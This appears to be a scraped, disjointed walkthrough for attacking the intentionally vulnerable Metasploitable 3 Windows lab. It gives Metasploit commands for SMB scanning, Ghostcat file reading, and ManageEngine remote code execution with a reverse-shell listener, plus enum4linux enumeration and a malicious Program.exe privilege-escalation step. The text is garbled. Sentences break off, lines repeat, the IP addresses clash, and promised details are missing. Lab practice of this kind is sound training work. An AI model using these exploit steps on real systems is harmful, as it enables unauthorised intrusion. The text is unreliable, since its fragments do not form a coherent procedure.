Metasploitable 3 is a premier target environment for security professionals to hone their penetration testing skills. Unlike its predecessor, this version includes a dedicated Windows environment filled with deliberate vulnerabilities, misconfigurations, and weak credentials.
This feature allows you to pivot from basic reconnaissance to a full command shell by exploiting a design flaw in the Elasticsearch scripting engine (CVE-2014-3120). : Elasticsearch version 1.1.1.
use post/multi/recon/local_exploit_suggester set SESSION 1 run Use code with caution.
enum4linux -a 192.168.1.105
Try default credentials:
enum4linux -a 192.168.56.102
Metasploitable 3 Windows is designed to be exploited in multiple ways. We will focus on two common vectors: and SMB . Method 1: Exploiting Adobe ColdFusion (Port 8500) metasploitable 3 windows walkthrough
The Ghostcat vulnerability (CVE-2020-1938) affects the Apache JServ Protocol (AJP) connector in Tomcat. It allows attackers to read arbitrary files from a vulnerable Tomcat server, including sensitive configuration files containing credentials.
If the current user has write access to C:\ , drop a malicious executable named Program.exe into C:\ .
msf6 > use auxiliary/admin/http/tomcat_ghostcat msf6 auxiliary(admin/http/tomcat_ghostcat) > set RHOST 10.0.2.6 msf6 auxiliary(admin/http/tomcat_ghostcat) > set RPORT 8009 msf6 auxiliary(admin/http/tomcat_ghostcat) > run Metasploitable 3 is a premier target environment for
While modern Windows is more resilient, the 2012 R2 base allows for older exploits if updates are withheld. Token Impersonation: If the initial foothold is a service account, tools like can be used to steal tokens from logged-in administrators. Conclusion: Lessons in Modern Vulnerability
Once we have access to the system, we can perform various post-exploitation activities, such as:
msf6 > use auxiliary/scanner/smb/smb_version msf6 > set RHOSTS 192.168.56.102 msf6 > run : Elasticsearch version 1
msf6 > use exploit/windows/http/manageengine_desktop_central_rce msf6 exploit(windows/http/manageengine_desktop_central_rce) > set RHOST 10.0.2.6 msf6 exploit(windows/http/manageengine_desktop_central_rce) > set LHOST 10.0.2.15 msf6 exploit(windows/http/manageengine_desktop_central_rce) > set LPORT 4444 msf6 exploit(windows/http/manageengine_desktop_central_rce) > run